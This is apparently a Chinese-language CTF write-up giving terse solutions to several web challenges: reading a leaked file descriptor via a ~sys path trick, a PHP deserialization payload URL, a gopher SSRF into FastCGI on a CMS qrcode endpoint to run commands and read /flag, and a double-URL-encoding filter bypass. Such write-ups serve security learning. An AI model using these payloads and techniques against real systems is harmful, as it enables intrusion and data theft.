Author:没队伍一人康康题
c0ol P@th
data:image/s3,"s3://crabby-images/613e2/613e2f8efb24bf150ff34e4bb760a0c422ce5c09" alt="image-20221224104947058"
expanduser可以~开头转换对应用户的home。对应/etc/passwd
使用~sys。即可转换为/dev/
data:image/s3,"s3://crabby-images/2dcb9/2dcb9d12be6f82806748e8c5a61352efcdfafb50" alt="image-20221224105108348"
刚好flag open了。没close。会有一个fd留着
爆破~sys/fd/6
32加32
16进制 base64 zip解压
pop1
<?php
class kaka
{
public $pass = true;
public $name = '1';
public $age = '1';
public function cflag()
{
if ($this->pass) {
eval(system('cat /flag'));
} else {
echo "no word, flag";
}
}
public function cname($n, $a)
{
if ($this->name === $n) {
if ($this->age === $a) {
return true;
}
}
}
}
$data=serialize(new kaka());
echo $data;
http://39.107.127.105:50906/?pop=O:4:%22kaka%22:3:{s:4:%22pass%22;b:1;s:4:%22name%22;s:1:%221%22;s:3:%22age%22;s:1:%221%22;}&name=lilei&age=two
ezxunrui
找更新日志
data:image/s3,"s3://crabby-images/571c4/571c447e4ac9b1988e6195d915fcff45e23489a9" alt="image-20221224121932593"
全局搜dr_catcher_data
data:image/s3,"s3://crabby-images/8731c/8731ce12a9298d1e242ba30b1c2f36b163145d2f" alt="image-20221224122001362"
data:image/s3,"s3://crabby-images/31752/31752f2ab417012083756566dc0967fbddd081fe" alt="image-20221224122012986"
可以控制参数进入ssrf。nginx一般是fastcgi。打gopher ssrf
data:image/s3,"s3://crabby-images/b0f26/b0f26b0218b90a1d3d8edf6cb8d3d361df9b9856" alt="image-20221224122052997"
先ls|base64 -w0 一次发现有/readflag
然后读flag
data:image/s3,"s3://crabby-images/ed9fc/ed9fc53182f46b19dfc0ae31c4700449ef87aba5" alt="image-20221224122132789"
http://39.106.156.96:46243/index.php?s=api&c=api&m=qrcode&thumb=gopher payload&text=123&level=1&size=1
Ex1T
原题
https://www.ctfiot.com/59624.html
data:image/s3,"s3://crabby-images/3a8cd/3a8cd046bfcb30be2477c551be737002f4685012" alt="image-20221224134158547"
芝士雪豹
root起的java。。非预期直接两次URL编码绕过flag关键字过滤
data:image/s3,"s3://crabby-images/e38c9/e38c941213a4885baa8501d09205e089efab138a" alt="image-20221224134248802"